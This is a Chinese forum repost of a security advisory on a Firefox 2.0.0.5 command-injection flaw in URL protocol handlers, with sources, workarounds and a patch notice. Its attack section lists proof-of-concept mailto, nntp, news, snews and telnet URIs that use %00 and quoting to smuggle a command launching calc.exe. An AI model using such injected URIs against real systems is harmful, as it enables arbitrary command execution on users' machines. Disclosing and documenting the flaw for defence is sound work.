[分享] Firefox URL处理器远程命令注入漏洞

西布伦

Firefox URL处理器远程命令注入漏洞

涉及程序：
Firefox
  
描述：
Firefox URL处理器远程命令注入漏洞

  
详细：
Firefox是一款非常流行的开源WEB浏览器。

Firefox处理包含特定字符的URL串时存在命令注入漏洞，远程攻击者可能利用此漏洞在用户系统上执行任意命令。

Firefox没有过滤传送给某些URI的数据，如果向http、https、ftp、gopher、telnet、mailto、news、snews、nttp等协议传送了包含有“%00”字符的URL，就会根据完整URL的扩展名调用FileType处理器而不是ULR协议处理器，然后将URL传送给该文件处理器。远程攻击者可以通过创建恶意的URI链接来利用这个漏洞，如果用户受骗跟随了该链接的话，Firefox就会将URI传送给注册的URI处理器， 导致注入并执行任意命令。

<*来源：Billy (BK) Rios （billy.rios@gmail）

链接：http://secunia.com/advisories/26201/
     https://bugzilla.mozilla.org/sho ... tiple&id=389580
     http://www.kb.cert.org/vuls/id/783400
     http://xs-sniper.com/blog/2007/0 ... on-in-firefox-2005/
     http://www.gnucitizen.org/blog/attack-of-the-url-vulnerabilities
     http://msinfluentials.com/blogs/ ... not-legal-in-a-url.
*>

受影响系统：
Mozilla Firefox 2.0.0.5

  
攻击方法：
警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

mailto:%00%00../../../../../../windows/system32/cmd".exe ../../../../../../../../windows/system32/calc.exe " - " blah.bat
nntp:windows/system32/calc.exe%20"%20-%20"%20blah.bat
news:windows/system32/calc.exe%20"%20-%20"%20blah.bat
snews:windows/system32/calc.exe%20"%20-%20"%20blah.bat
telnet:windows/system32/calc.exe%20"%20-%20"%20blah.bat


  
解决方案：
临时解决方法：

* 使用about:config接口，设置network.protocol-handler.warn-external-default、network.protocol-handler.warn-external.mailto、network.protocol-handler.warn-external.news、network.protocol-handler.warn-external.nntp、network.protocol-handler.warn-external.snews为true。
* 不要跟随协议名后包含有%00的链接。

厂商补丁：

Mozilla
-------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://www.mozilla.org/